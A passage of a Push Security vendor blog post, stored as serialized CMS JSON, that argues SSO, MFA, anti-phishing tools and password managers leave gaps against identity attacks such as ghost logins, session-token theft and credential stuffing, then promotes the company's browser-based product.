compilation",{"data":225669,"marks":225670,"value":197,"nodeType":173},{},[],{"data":225672,"content":225673,"nodeType":254},{},[225674],{"data":225675,"content":225676,"nodeType":178},{},[225677,225681,225689],{"data":225678,"marks":225679,"value":225680,"nodeType":173},{},[],"And ultimately, ",{"data":225682,"content":225683,"nodeType":186},{"uri":118063},[225684],{"data":225685,"marks":225686,"value":225688,"nodeType":173},{},[225687],{"type":194},"high-profile breaches",{"data":225690,"marks":225691,"value":225692,"nodeType":173},{},[]," of Snowflake customers, Microsoft, Okta, and others reinforce the threat behind the numbers, all of which are the result of identity attacks. ",{"data":225694,"content":225695,"nodeType":178},{},[225696],{"data":225697,"marks":225698,"value":225700,"nodeType":173},{},[225699],{"type":370},"So, if a business uses any third-party provided web applications or services, then its workforce identities are the lowest-hanging fruit for attackers to pick, and the risk of account takeover should be high up on the risk register. ",{"data":225702,"content":225703,"nodeType":178},{},[225704],{"data":225705,"marks":225706,"value":225707,"nodeType":173},{},[],"Yes, it’s tough to redo budgets on the fly or rip up a five year plan. But, asymmetrical cyber TTPs have always sought to undermine the best laid plans of CISOs – attackers usually look in the places that defenders aren't. ",{"data":225709,"content":225710,"nodeType":178},{},[225711],{"data":225712,"marks":225713,"value":225714,"nodeType":173},{},[],"When looking at the evidence, is securing the identity attack surface really a lower priority than adding a CASB, CSPM, or shiny new AI tool? Even when we look at historical recurring spend on things like EDR or vulnerability management, it’s arguable that the risk of identity attacks has overtaken software-based exploits for many organizations whose traditional networks are shrinking, while their cloud app estate grows. ",{"data":225716,"content":225717,"nodeType":178},{},[225718],{"data":225719,"marks":225720,"value":225722,"nodeType":173},{},[225721],{"type":370},"It’s important to consider what’s right for your business, but the evidence shows us that securing the identity attack surface promises real risk reduction in the face of a genuine threat. ",{"data":225724,"content":225725,"nodeType":231},{},[],{"data":225727,"content":225728,"nodeType":169},{},[225729],{"data":225730,"marks":225731,"value":225732,"nodeType":173},{},[],"Reason 2: “Our business apps are all behind SSO”",{"data":225734,"content":225735,"nodeType":178},{},[225736],{"data":225737,"marks":225738,"value":225739,"nodeType":173},{},[],"SSO is often seen as a utopia where each employee has a single, secure digital identity that is used to access all of their work applications. When businesses are using SSO, we usually hear:",{"data":225741,"content":225742,"nodeType":235},{},[225743],{"data":225744,"marks":225745,"value":225746,"nodeType":173},{},[],"“Everything is behind SSO, there are no apps outside of it.”",{"data":225748,"content":225749,"nodeType":178},{},[225750,225754,225763,225767,225772],{"data":225751,"marks":225752,"value":225753,"nodeType":173},{},[],"Unfortunately, organizations are always using more apps than they realize. The impact of ",{"data":225755,"content":225757,"nodeType":186},{"uri":225756},"https://productled.com/blog/product-led-growth-definition",[225758],{"data":225759,"marks":225760,"value":225762,"nodeType":173},{},[225761],{"type":194},"product-led growth",{"data":225764,"marks":225765,"value":225766,"nodeType":173},{},[]," on the self adoption of cloud services is well documented, and we see that ",{"data":225768,"marks":225769,"value":225771,"nodeType":173},{},[225770],{"type":370},"even SMEs typically have 100+ apps in their estate",{"data":225773,"marks":225774,"value":225775,"nodeType":173},{},[],", and the number of apps per business continues to grow year on year. ",{"data":225777,"content":225778,"nodeType":178},{},[225779,225783,225788,225792,225796,225800,225805],{"data":225780,"marks":225781,"value":225782,"nodeType":173},{},[],"So, while every ",{"data":225784,"marks":225785,"value":225787,"nodeType":173},{},[225786],{"type":370},"known ",{"data":225789,"marks":225790,"value":225791,"nodeType":173},{},[],"app",{"data":225793,"marks":225794,"value":3107,"nodeType":173},{},[225795],{"type":370},{"data":225797,"marks":225798,"value":225799,"nodeType":173},{},[],"might be behind SSO, this still leaves tens or hundreds of ",{"data":225801,"marks":225802,"value":225804,"nodeType":173},{},[225803],{"type":370},"unknown",{"data":225806,"marks":225807,"value":225808,"nodeType":173},{},[]," apps, with thousands of associated identities. ",{"data":225810,"content":225811,"nodeType":178},{},[225812,225816,225821,225825,225833],{"data":225813,"marks":225814,"value":225815,"nodeType":173},{},[],"But even if you did know about every app, the fact of the matter is ",{"data":225817,"marks":225818,"value":225820,"nodeType":173},{},[225819],{"type":370},"that fewer than 1 in 3 apps actually support SAML SSO",{"data":225822,"marks":225823,"value":225824,"nodeType":173},{},[],", and many of those ",{"data":225826,"content":225827,"nodeType":186},{"uri":27492},[225828],{"data":225829,"marks":225830,"value":225832,"nodeType":173},{},[225831],{"type":194},"only at the premium tier",{"data":225834,"marks":225835,"value":225836,"nodeType":173},{},[],". Our data shows that the proportion of apps actually behind SSO is even lower, at 1 in 5. So getting everything behind SSO just isn’t a realistic goal for any organization. ",{"data":225838,"content":225839,"nodeType":235},{},[225840],{"data":225841,"marks":225842,"value":225843,"nodeType":173},{},[],"“Everything important is behind SSO, and the apps that aren’t don’t pose a risk.” ",{"data":225845,"content":225846,"nodeType":178},{},[225847],{"data":225848,"marks":225849,"value":225850,"nodeType":173},{},[],"There’s often a view that if it wasn’t centrally procured, IT wasn’t involved, and it’s not behind SSO, then it’s just not a concern. But apps can have complex integrations and permissions that increase the potential blast radius of an app compromise. ",{"data":225852,"content":225853,"nodeType":178},{},[225854,225858,225866,225870,225877],{"data":225855,"marks":225856,"value":225857,"nodeType":173},{},[],"We’ve published ",{"data":225859,"content":225860,"nodeType":186},{"uri":88239},[225861],{"data":225862,"marks":225863,"value":225865,"nodeType":173},{},[225864],{"type":194},"extensive research on SaaS-native attack techniques",{"data":225867,"marks":225868,"value":225869,"nodeType":173},{},[]," and documented many of the scenarios in which attackers can expand from hijacking a single SaaS app with a small number of users into a larger-scale compromise, for example through ",{"data":225871,"content":225872,"nodeType":186},{"uri":70029},[225873],{"data":225874,"marks":225875,"value":63256,"nodeType":173},{},[225876],{"type":194},{"data":225878,"marks":225879,"value":225880,"nodeType":173},{},[],": Modifying SAML for a compromised app to redirect users to a malicious domain during the authentication process that proxies a legitimate authentication service (e.g. Google, Okta or Microsoft) – effectively acting as a watering hole for further credential harvesting. ",{"data":225882,"content":225883,"nodeType":178},{},[225884],{"data":225885,"marks":225886,"value":225887,"nodeType":173},{},[],"Also, the value of an app is not necessarily tied to the number of users it has in the business. A sales and marketing app can contain huge amounts of sensitive data, as can developer apps – just look at Snowflake! It only takes a single account to be created, a single integration to be set up, to result in a major data breach down the line. ",{"data":225889,"content":225890,"nodeType":178},{},[225891,225895,225904,225907,225916],{"data":225892,"marks":225893,"value":225894,"nodeType":173},{},[],"You can check out our ",{"data":225896,"content":225898,"nodeType":186},{"uri":225897},"https://pushsecurity.com/blog/",[225899],{"data":225900,"marks":225901,"value":225903,"nodeType":173},{},[225902],{"type":194},"blog page",{"data":225905,"marks":225906,"value":1464,"nodeType":173},{},[],{"data":225908,"content":225910,"nodeType":186},{"uri":225909},"https://www.youtube.com/watch?v=xZIQd_0v9sE&t=12s",[225911],{"data":225912,"marks":225913,"value":225915,"nodeType":173},{},[225914],{"type":194},"watch one of our videos",{"data":225917,"marks":225918,"value":225919,"nodeType":173},{},[]," for more information.   ",{"data":225921,"content":225922,"nodeType":235},{},[225923],{"data":225924,"marks":225925,"value":225926,"nodeType":173},{},[],"Ghost logins: A nightmare for SSO, dreamy for attackers",{"data":225928,"content":225929,"nodeType":178},{},[225930,225934,225939,225943,225951],{"data":225931,"marks":225932,"value":225933,"nodeType":173},{},[],"You might already be feeling a bit deflated that SSO isn’t going to give you everything you wanted, and we’re sorry to be the bearer of bad news. Unfortunately, ",{"data":225935,"marks":225936,"value":225938,"nodeType":173},{},[225937],{"type":370},"even if you are using SSO, additional login methods can still exist alongside SSO",{"data":225940,"marks":225941,"value":225942,"nodeType":173},{},[],". We call these ",{"data":225944,"content":225945,"nodeType":186},{"uri":832},[225946],{"data":225947,"marks":225948,"value":835,"nodeType":173},{},[225949,225950],{"type":194},{"type":370},{"data":225952,"marks":225953,"value":197,"nodeType":173},{},[225954],{"type":370},{"data":225956,"content":225957,"nodeType":178},{},[225958],{"data":225959,"marks":225960,"value":225961,"nodeType":173},{},[],"Ghost logins are effectively any alternative login method. In addition to SSO, you could have a local password, a social login (e.g., login with Google, Facebook, etc.), backup emails, or API-based login methods. ",{"data":225963,"content":225964,"nodeType":178},{},[225965],{"data":225966,"marks":225967,"value":225968,"nodeType":173},{},[],"Multiple methods are often enabled by default and need to be explicitly disabled at the app level. Further, migrating an existing app to SSO doesn’t automatically remove local accounts, but effectively adds an SSO layer on top. ",{"data":225970,"content":225971,"nodeType":178},{},[225972,225976,225981,225985,225993],{"data":225973,"marks":225974,"value":225975,"nodeType":173},{},[],"The final problem here is that because MFA is applied separately at the app level and SSO level, ",{"data":225977,"marks":225978,"value":225980,"nodeType":173},{},[225979],{"type":370},"you can have local logins without MFA, at the same time as SSO logins with MFA — that can be used concurrently.",{"data":225982,"marks":225983,"value":225984,"nodeType":173},{},[]," This was acutely felt during the recent Snowflake breaches, ",{"data":225986,"content":225987,"nodeType":186},{"uri":184425},[225988],{"data":225989,"marks":225990,"value":225992,"nodeType":173},{},[225991],{"type":194},"where in-app identification and disabling of non-SSO logins proved to be particularly error-prone",{"data":225994,"marks":225995,"value":481,"nodeType":173},{},[],{"data":225997,"content":225998,"nodeType":178},{},[225999,226003],{"data":226000,"marks":226001,"value":226002,"nodeType":173},{},[],"The result here is that credential stuffing attacks can still prove successful against your SSO-joined apps if local logins exist, and MFA hasn’t been specifically set at the app level. ",{"data":226004,"marks":226005,"value":226007,"nodeType":173},{},[226006],{"type":370},"And unless you’ve specifically disabled them and unset every non-SSO login for every app, they probably do. ",{"data":226009,"content":226010,"nodeType":235},{},[226011],{"data":226012,"marks":226013,"value":226014,"nodeType":173},{},[],"The verdict: SSO is great, but it's no silver bullet",{"data":226016,"content":226017,"nodeType":178},{},[226018,226022,226030],{"data":226019,"marks":226020,"value":226021,"nodeType":173},{},[],"While SSO is invariably a beneficial security control, ",{"data":226023,"content":226025,"nodeType":186},{"uri":226024},"https://pushsecurity.com/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you/#id-how-can-ghost-logins-be-abused-by-attackers_id-ghost-logins-for-persistence-and-defense-evasion",[226026],{"data":226027,"marks":226028,"value":226029,"nodeType":173},{},[],"attackers can also naturally exploit it to gain access to a large number of downstream applications",{"data":226031,"marks":226032,"value":226033,"nodeType":173},{},[],". If you compromise an IdP account like Okta, you can then access any connected app, often without requiring any further authentication.",{"data":226035,"content":226036,"nodeType":178},{},[226037,226041,226049,226052,226061],{"data":226038,"marks":226039,"value":226040,"nodeType":173},{},[],"We’ve seen this recently, with an ",{"data":226042,"content":226043,"nodeType":186},{"uri":155679},[226044],{"data":226045,"marks":226046,"value":226048,"nodeType":173},{},[226047],{"type":194},"unprecedented spike in credential stuffing attacks reported by Okta",{"data":226050,"marks":226051,"value":140145,"nodeType":173},{},[],{"data":226053,"content":226055,"nodeType":186},{"uri":226054},"https://www.bleepingcomputer.com/news/security/okta-warns-of-credential-stuffing-attacks-targeting-its-cors-feature/",[226056],{"data":226057,"marks":226058,"value":226060,"nodeType":173},{},[226059],{"type":194},"attacks looking to exploit Okta’s CORS feature",{"data":226062,"marks":226063,"value":197,"nodeType":173},{},[],{"data":226065,"content":226066,"nodeType":178},{},[226067,226072],{"data":226068,"marks":226069,"value":226071,"nodeType":173},{},[226070],{"type":370},"Ultimately, the promised land of a 1:1 employee to identity ratio just isn’t realistic. ",{"data":226073,"marks":226074,"value":226075,"nodeType":173},{},[],"So while SSO is a big part of the solution to identity attacks, it’s not a silver bullet.   ",{"data":226077,"content":226078,"nodeType":231},{},[],{"data":226080,"content":226081,"nodeType":169},{},[226082],{"data":226083,"marks":226084,"value":226085,"nodeType":173},{},[],"Reason 3: “We’ve got MFA deployed everywhere”",{"data":226087,"content":226088,"nodeType":178},{},[226089,226093,226102],{"data":226090,"marks":226091,"value":226092,"nodeType":173},{},[],"Microsoft famously stated that ",{"data":226094,"content":226096,"nodeType":186},{"uri":226095},"https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023#:~:text=Outlier%20attacks%20make%20up%20just,of%20compromise%20by%2099.2%20percent.",[226097],{"data":226098,"marks":226099,"value":226101,"nodeType":173},{},[226100],{"type":194},"MFA reduces the risk of compromise by 99.2%",{"data":226103,"marks":226104,"value":226105,"nodeType":173},{},[],". But this doesn’t mean that it stops 99% of attacks. Or, that it should make up 99% of your defense. ",{"data":226107,"content":226108,"nodeType":178},{},[226109,226113],{"data":226110,"marks":226111,"value":226112,"nodeType":173},{},[],"MFA unarguably raises the bar for attackers, even if that bar is still pretty low. Naturally, accounts without MFA are an easier target. ",{"data":226114,"marks":226115,"value":226117,"nodeType":173},{},[226116],{"type":370},"But the problem is that MFA isn’t an enterprise-wide castle wall. It’s more like a row of hurdles with gaps in-between. ",{"data":226119,"content":226120,"nodeType":178},{},[226121,226125,226133],{"data":226122,"marks":226123,"value":226124,"nodeType":173},{},[],"MFA is usually handled separately at the SSO level and app level. For apps that are self-adopted by end users, they can't be relied on to add in a security control that will introduce friction to their user experience. Building on the aforementioned ghost logins, even if MFA is adopted at the SSO level, local logins can exist without MFA unless also applied at the app level. ",{"data":226126,"content":226127,"nodeType":186},{"uri":184425},[226128],{"data":226129,"marks":226130,"value":226132,"nodeType":173},{},[226131],{"type":194},"The recent Snowflake breach is a perfect example of this problem",{"data":226134,"marks":226135,"value":197,"nodeType":173},{},[],{"data":226137,"content":226138,"nodeType":178},{},[226139,226143,226148],{"data":226140,"marks":226141,"value":226142,"nodeType":173},{},[],"Because of this, ",{"data":226144,"marks":226145,"value":226147,"nodeType":173},{},[226146],{"type":370},"we find that only around 1 in 3 identities actually have MFA enabled",{"data":226149,"marks":226150,"value":197,"nodeType":173},{},[],{"data":226152,"content":226153,"nodeType":235},{},[226154],{"data":226155,"marks":226156,"value":226157,"nodeType":173},{},[],"\"MFA protects us against phishing attacks\"",{"data":226159,"content":226160,"nodeType":178},{},[226161,226165,226172],{"data":226162,"marks":226163,"value":226164,"nodeType":173},{},[],"Even where MFA is deployed, most MFA methods are proven to be phishable or otherwise bypassable. SMS and push-based MFA are susceptible to well known bypasses including SIM swapping and ",{"data":226166,"content":226167,"nodeType":186},{"uri":775},[226168],{"data":226169,"marks":226170,"value":778,"nodeType":173},{},[226171],{"type":194},{"data":226173,"marks":226174,"value":226175,"nodeType":173},{},[]," attacks. TOTP is a little better, but still vulnerable. ",{"data":226177,"content":226178,"nodeType":178},{},[226179,226183,226191,226195,226203],{"data":226180,"marks":226181,"value":226182,"nodeType":173},{},[],"Many attacks are simply cutting out the middleman and focusing on ",{"data":226184,"content":226185,"nodeType":186},{"uri":114992},[226186],{"data":226187,"marks":226188,"value":226190,"nodeType":173},{},[226189],{"type":194},"using stolen session tokens",{"data":226192,"marks":226193,"value":226194,"nodeType":173},{},[]," to bypass MFA. The most common method for this is via infostealers, which typically scrape all credentials (e.g. usernames, passwords, login pages, session tokens) as well as other information stored in the browser of an infected device. ",{"data":226196,"content":226197,"nodeType":186},{"uri":4411},[226198],{"data":226199,"marks":226200,"value":226202,"nodeType":173},{},[226201],{"type":194},"Infostealers played a major role in the recent Snowflake breach",{"data":226204,"marks":226205,"value":197,"nodeType":173},{},[],{"data":226207,"content":226208,"nodeType":178},{},[226209,226213,226221],{"data":226210,"marks":226211,"value":226212,"nodeType":173},{},[],"Additionally, ",{"data":226214,"content":226215,"nodeType":186},{"uri":49844},[226216],{"data":226217,"marks":226218,"value":226220,"nodeType":173},{},[226219],{"type":194},"modern phishing techniques like adversary-in-the-middle (AitM) and browser-in-the-middle (BitM)",{"data":226222,"marks":226223,"value":226224,"nodeType":173},{},[]," see the attacker steal the live session and associated tokens from the victim, with the victim prompted to complete the MFA process as part of the attack. ",{"data":226226,"content":226227,"nodeType":235},{},[226228],{"data":226229,"marks":226230,"value":226231,"nodeType":173},{},[],"“We’re using passkeys”",{"data":226233,"content":226234,"nodeType":178},{},[226235],{"data":226236,"marks":226237,"value":226238,"nodeType":173},{},[],"Great! Passkey users are in a better position than 99% of other businesses. Passkeys are widely accepted to be phishing resistant – at least for now, although as more businesses use them, new ways of getting around them will no doubt be discovered by attackers. ",{"data":226240,"content":226241,"nodeType":178},{},[226242,226246,226254],{"data":226243,"marks":226244,"value":226245,"nodeType":173},{},[],"But, MFA downgrade attacks are possible. There are often backup MFA methods set that can be selected by canceling the authentication prompt and selecting a different method. Even when these aren’t selectable, ",{"data":226247,"content":226248,"nodeType":186},{"uri":49783},[226249],{"data":226250,"marks":226251,"value":226253,"nodeType":173},{},[226252],{"type":194},"researchers have demonstrated ways of downgrading authentication to use a phishable method",{"data":226255,"marks":226256,"value":197,"nodeType":173},{},[],{"data":226258,"content":226259,"nodeType":178},{},[226260],{"data":226261,"marks":226262,"value":226263,"nodeType":173},{},[],"Most apps are designed primarily for user flexibility, not security. And backup methods have a legitimate use-case – what if the authenticator device is lost or stops working? If passkeys are the only authentication method, you just got locked out of all of your accounts. But at least no hackers can access them either, right?",{"data":226265,"content":226266,"nodeType":178},{},[226267],{"data":226268,"marks":226269,"value":226271,"nodeType":173},{},[226270],{"type":370},"Like SSO, unless backup MFA methods are disabled for all identities and apps, and all users have enabled MFA across all their accounts and login methods, this isn’t a silver bullet either.  ",{"data":226273,"content":226274,"nodeType":231},{},[],{"data":226276,"content":226277,"nodeType":169},{},[226278],{"data":226279,"marks":226280,"value":226281,"nodeType":173},{},[],"Reason 4: “We’ve got anti-phishing controls already”",{"data":226283,"content":226284,"nodeType":178},{},[226285],{"data":226286,"marks":226287,"value":226288,"nodeType":173},{},[],"Identity attacks have evolved significantly in recent years, as have the environments being targeted by attackers with the shift to cloud services and decentralized business IT. Unfortunately, traditional anti-phishing controls weren’t designed for this reality. ",{"data":226290,"content":226291,"nodeType":250},{},[226292,226311],{"data":226293,"content":226294,"nodeType":254},{},[226295],{"data":226296,"content":226297,"nodeType":178},{},[226298,226302,226307],{"data":226299,"marks":226300,"value":176058,"nodeType":173},{},[226301],{"type":370},{"data":226303,"marks":226304,"value":226306,"nodeType":173},{},[226305],{"type":370},"ttacks used to be focused on a single VPN/webmail endpoint ",{"data":226308,"marks":226309,"value":226310,"nodeType":173},{},[],"that was naturally easier to protect than 100+ SaaS apps (especially if the security team isn’t even aware of them). Attackers now have 1000s of sprawled identities to target per enterprise, increasing the chance that weak or reused passwords will be found. ",{"data":226312,"content":226313,"nodeType":254},{},[226314],{"data":226315,"content":226316,"nodeType":178},{},[226317,226322],{"data":226318,"marks":226319,"value":226321,"nodeType":173},{},[226320],{"type":370},"Likewise, security teams only needed to care about a small set of credentials ",{"data":226323,"marks":226324,"value":226325,"nodeType":173},{},[],"relating to user directory accounts and VPN/remote access tooling used to tunnel into the corporate network. Now, business functions and data are dispersed across cloud apps rather than being neatly contained in on-prem apps and databases.",{"data":226327,"content":226328,"nodeType":178},{},[226329],{"data":226330,"marks":226331,"value":226333,"nodeType":173},{},[226332],{"type":370},"Now, attackers have more platforms on which to phish your users, more credentials to choose from, and more apps to spray them across, while security teams have a much larger surface to defend.",{"data":226335,"content":226336,"nodeType":235},{},[226337],{"data":226338,"marks":226339,"value":226340,"nodeType":173},{},[],"“Our email and content filtering controls stop phishing attacks”",{"data":226342,"content":226343,"nodeType":178},{},[226344],{"data":226345,"marks":226346,"value":226347,"nodeType":173},{},[],"Existing phishing prevention solutions have tried to solve the problem by protecting the inbox, a common (but not the only) attack vector, or by blocking lists of known-bad domains. ",{"data":226349,"content":226350,"nodeType":178},{},[226351],{"data":226352,"marks":226353,"value":226354,"nodeType":173},{},[],"But, these approaches have major shortcomings:",{"data":226356,"content":226357,"nodeType":250},{},[226358,226396,226411],{"data":226359,"content":226360,"nodeType":254},{},[226361],{"data":226362,"content":226363,"nodeType":178},{},[226364,226369,226373,226381,226384,226392],{"data":226365,"marks":226366,"value":226368,"nodeType":173},{},[226367],{"type":370},"Incomplete coverage: ",{"data":226370,"marks":226371,"value":226372,"nodeType":173},{},[],"Email-based phishing prevention tools can catch general spray-and-pray email phishing campaigns, but it only takes a small amount of tailoring to fly under their radar. The use of LLM tools to tailor phishing emails for their intended victims already makes this possible at scale. Email-based tools also fail to cover phishing attacks beyond the inbox, such as ",{"data":226374,"content":226375,"nodeType":186},{"uri":181526},[226376],{"data":226377,"marks":226378,"value":226380,"nodeType":173},{},[226379],{"type":194},"Slack",{"data":226382,"marks":226383,"value":933,"nodeType":173},{},[],{"data":226385,"content":226386,"nodeType":186},{"uri":181538},[226387],{"data":226388,"marks":226389,"value":226391,"nodeType":173},{},[226390],{"type":194},"Teams",{"data":226393,"marks":226394,"value":226395,"nodeType":173},{},[]," phishing.",{"data":226397,"content":226398,"nodeType":254},{},[226399],{"data":226400,"content":226401,"nodeType":178},{},[226402,226407],{"data":226403,"marks":226404,"value":226406,"nodeType":173},{},[226405],{"type":370},"Expired intel: ",{"data":226408,"marks":226409,"value":226410,"nodeType":173},{},[],"Tools that rely on known-bad domains always have an incomplete picture because a domain must be reported as malicious in order to get added to a blocklist. Meanwhile, attackers can spin up new sites or host phishing pages on existing sites by exploiting vulnerabilities in them, bypassing rules around preventing visits to newly registered domains. It’s like trying to hit a moving target.",{"data":226412,"content":226413,"nodeType":254},{},[226414],{"data":226415,"content":226416,"nodeType":178},{},[226417,226422,226426,226434],{"data":226418,"marks":226419,"value":226421,"nodeType":173},{},[226420],{"type":370},"Web-based obfuscation: ",{"data":226423,"marks":226424,"value":226425,"nodeType":173},{},[],"Attacker tools and malicious implants running on webpages are constantly evolving to evade fingerprinting, and attackers are using techniques like ",{"data":226427,"content":226428,"nodeType":186},{"uri":217485},[226429],{"data":226430,"marks":226431,"value":226433,"nodeType":173},{},[226432],{"type":194},"HTML smuggling",{"data":226435,"marks":226436,"value":226437,"nodeType":173},{},[]," to get around web-based controls put in place by developers. ",{"data":226439,"content":226440,"nodeType":178},{},[226441,226445,226450,226454,226459],{"data":226442,"marks":226443,"value":226444,"nodeType":173},{},[],"Even if these controls are sometimes successful, attackers have reliably demonstrated ways to get around them, ",{"data":226446,"marks":226447,"value":226449,"nodeType":173},{},[226448],{"type":370},"it really is a cat-and-mouse game at this point",{"data":226451,"marks":226452,"value":226453,"nodeType":173},{},[],". There usually needs to be a compromise before the attacker's infrastructure or tooling can be tagged and blocked, but ",{"data":226455,"marks":226456,"value":226458,"nodeType":173},{},[226457],{"type":370},"they evolve so rapidly that defenders are always one step behind",{"data":226460,"marks":226461,"value":197,"nodeType":173},{},[],{"data":226463,"content":226464,"nodeType":235},{},[226465],{"data":226466,"marks":226467,"value":226468,"nodeType":173},{},[],"“All our employees use a password manager”",{"data":226470,"content":226471,"nodeType":178},{},[226472],{"data":226473,"marks":226474,"value":226475,"nodeType":173},{},[],"Password managers are increasingly necessary due to the large number of credentials that users now have to juggle. Since the majority of apps don’t support SAML SSO, the need for separate credentials per app isn’t going away any time soon. ",{"data":226477,"content":226478,"nodeType":178},{},[226479,226483],{"data":226480,"marks":226481,"value":226482,"nodeType":173},{},[],"We often find 2 or more password managers in use per organization (not exactly optimal), but despite increased password manager adoption we see consistently high levels of password reuse, ",{"data":226484,"marks":226485,"value":226487,"nodeType":173},{},[226486],{"type":370},"with 1 in 3 users reusing passwords – including their sensitive IdP credentials. ",{"data":226489,"content":226490,"nodeType":178},{},[226491,226495,226503],{"data":226492,"marks":226493,"value":226494,"nodeType":173},{},[],"High levels of password reuse shows us that password managers don’t automatically result in secure employee behaviors, while widespread credential reuse significantly increases exposure to ",{"data":226496,"content":226497,"nodeType":186},{"uri":182804},[226498],{"data":226499,"marks":226500,"value":226502,"nodeType":173},{},[226501],{"type":194},"credential stuffing attacks",{"data":226504,"marks":226505,"value":226506,"nodeType":173},{},[]," where attackers spray known username and password combinations across a range of app login pages.  ",{"data":226508,"content":226509,"nodeType":178},{},[226510,226515],{"data":226511,"marks":226512,"value":226514,"nodeType":173},{},[226513],{"type":370},"Generally, businesses have very limited visibility into employee password data",{"data":226516,"marks":226517,"value":226518,"nodeType":173},{},[]," to be able to enforce good practice or accurately respond to data breaches involving credential dumps, even if employees are using a password manager (or several, as the case may be).  ",{"data":226520,"content":226521,"nodeType":231},{},[],{"data":226523,"content":226524,"nodeType":169},{},[226525],{"data":226526,"marks":226527,"value":226528,"nodeType":173},{},[],"Reason 5: “We’ve got all the security data we need”",{"data":226530,"content":226531,"nodeType":178},{},[226532],{"data":226533,"marks":226534,"value":226535,"nodeType":173},{},[],"Organizations looking to protect themselves from modern identity attacks suffer from a pretty substantial telemetry gap. ",{"data":226537,"content":226538,"nodeType":250},{},[226539,226554,226569,226584],{"data":226540,"content":226541,"nodeType":254},{},[226542],{"data":226543,"content":226544,"nodeType":178},{},[226545,226550],{"data":226546,"marks":226547,"value":226549,"nodeType":173},{},[226548],{"type":370},"Endpoint logs ",{"data":226551,"marks":226552,"value":226553,"nodeType":173},{},[],"won’t show anything meaningful because most identity attacks don’t need to target the endpoint – no malware is deployed, everything happens in the browser, over the internet. ",{"data":226555,"content":226556,"nodeType":254},{},[226557],{"data":226558,"content":226559,"nodeType":178},{},[226560,226565],{"data":226561,"marks":226562,"value":226564,"nodeType":173},{},[226563],{"type":370},"Application logs",{"data":226566,"marks":226567,"value":226568,"nodeType":173},{},[]," are limited in availability, scope, and ease of ingestion, with most app vendors providing substandard logging, and requiring complex custom integrations to get what little data is available. ",{"data":226570,"content":226571,"nodeType":254},{},[226572],{"data":226573,"content":226574,"nodeType":178},{},[226575,226580],{"data":226576,"marks":226577,"value":226579,"nodeType":173},{},[226578],{"type":370},"Network logs",{"data":226581,"marks":226582,"value":226583,"nodeType":173},{},[]," (such as via web proxy) struggle to gather and piece together identity data points at-scale, across different apps, due to the sheer volume and broken format of the data post-TLS-termination. ",{"data":226585,"content":226586,"nodeType":254},{},[226587],{"data":226588,"content":226589,"nodeType":178},{},[226590,226595],{"data":226591,"marks":226592,"value":226594,"nodeType":173},{},[226593],{"type":370},"Identity provider logs",{"data":226596,"marks":226597,"value":226598,"nodeType":173},{},[]," naturally only cover SSO integrated apps (and therefore don’t cover ⅔ of your business apps) and look exclusively at authentication, and so are blind to client side attacks like phishing. ",{"data":226600,"content":226601,"nodeType":178},{},[226602,226606,226614],{"data":226603,"marks":226604,"value":226605,"nodeType":173},{},[],"Unless you’re ingesting data from a browser-based solution like Push, it’s unlikely you have a full monitoring visibility of your identity attack surface. ",{"data":226607,"content":226608,"nodeType":186},{"uri":75099},[226609],{"data":226610,"marks":226611,"value":226613,"nodeType":173},{},[226612],{"type":194},"Read more on the value of browser telemetry here. ",{"data":226615,"marks":226616,"value":37,"nodeType":173},{},[],{"data":226618,"content":226621,"nodeType":312},{"target":226619},{"sys":226620},{"id":217818,"type":317,"linkType":318},[],{"data":226623,"content":226624,"nodeType":231},{},[],{"data":226626,"content":226627,"nodeType":169},{},[226628],{"data":226629,"marks":226630,"value":226631,"nodeType":173},{},[],"Maybe there’s a reason for Push to exist after all!",{"data":226633,"content":226634,"nodeType":178},{},[226635,226640,226644,226649,226652,226657],{"data":226636,"marks":226637,"value":226639,"nodeType":173},{},[226638],{"type":370},"The key takeaway here is that there are no quick fixes or silver bullets. ",{"data":226641,"marks":226642,"value":226643,"nodeType":173},{},[],"Things like SSO, MFA, and password managers are all part of the solution, ",{"data":226645,"marks":226646,"value":226648,"nodeType":173},{},[226647],{"type":370},"but",{"data":226650,"marks":226651,"value":3107,"nodeType":173},{},[],{"data":226653,"marks":226654,"value":226656,"nodeType":173},{},[226655],{"type":370},"aren’t set-and-forget controls",{"data":226658,"marks":226659,"value":226660,"nodeType":173},{},[],". They need to be continually monitored and maintained to ensure they remain effective.",{"data":226662,"content":226663,"nodeType":178},{},[226664],{"data":226665,"marks":226666,"value":226667,"nodeType":173},{},[],"Push stops identity attacks by continually finding and fixing identity vulnerabilities, providing deep context to manage the identity attack surface without looking through blinkers at the IdP or individual apps. ",{"data":226669,"content":226670,"nodeType":178},{},[226671],{"data":226672,"marks":226673,"value":226674,"nodeType":173},{},[],"Push helps businesses to get the most out of their identity controls (and bridge the gaps they leave) by:",{"data":226676,"content":226677,"nodeType":250},{},[226678,226693,226708,226723,226738],{"data":226679,"content":226680,"nodeType":254},{},[226681],{"data":226682,"content":226683,"nodeType":178},{},[226684,226689],{"data":226685,"marks":226686,"value":226688,"nodeType":173},{},[226687],{"type":370},"Locating all business apps",{"data":226690,"marks":226691,"value":226692,"nodeType":173},{},[],", not just those plugged into your IdP, so they can be put behind SSO (where possible) or at least securely managed and configured.",{"data":226694,"content":226695,"nodeType":254},{},[226696],{"data":226697,"content":226698,"nodeType":178},{},[226699,226704],{"data":226700,"marks":226701,"value":226703,"nodeType":173},{},[226702],{"type":370},"Identifying all workforce identities, associated login types, and MFA methods",{"data":226705,"marks":226706,"value":226707,"nodeType":173},{},[]," to more clearly pinpoint gaps, harden identities, and remediate vulnerabilities like ghost logins.",{"data":226709,"content":226710,"nodeType":254},{},[226711],{"data":226712,"content":226713,"nodeType":178},{},[226714,226719],{"data":226715,"marks":226716,"value":226718,"nodeType":173},{},[226717],{"type":370},"Stopping account takeover attempts",{"data":226720,"marks":226721,"value":226722,"nodeType":173},{},[]," by detecting and blocking AitM and BitM phishing toolkits running on webpages, blocking sensitive credential reuse to prevent credential phishing, and identifying stolen sessions running in attacker browsers. ",{"data":226724,"content":226725,"nodeType":254},{},[226726],{"data":226727,"content":226728,"nodeType":178},{},[226729,226734],{"data":226730,"marks":226731,"value":226733,"nodeType":173},{},[226732],{"type":370},"Preventing password-based attacks",{"data":226735,"marks":226736,"value":226737,"nodeType":173},{},[]," by detecting the use of weak, reused, and breached passwords across the app estate.  ",{"data":226739,"content":226740,"nodeType":254},{},[226741],{"data":226742,"content":226743,"nodeType":178},{},[226744,226749],{"data":226745,"marks":226746,"value":226748,"nodeType":173},{},[226747],{"type":370},"Providing unique telemetry in the 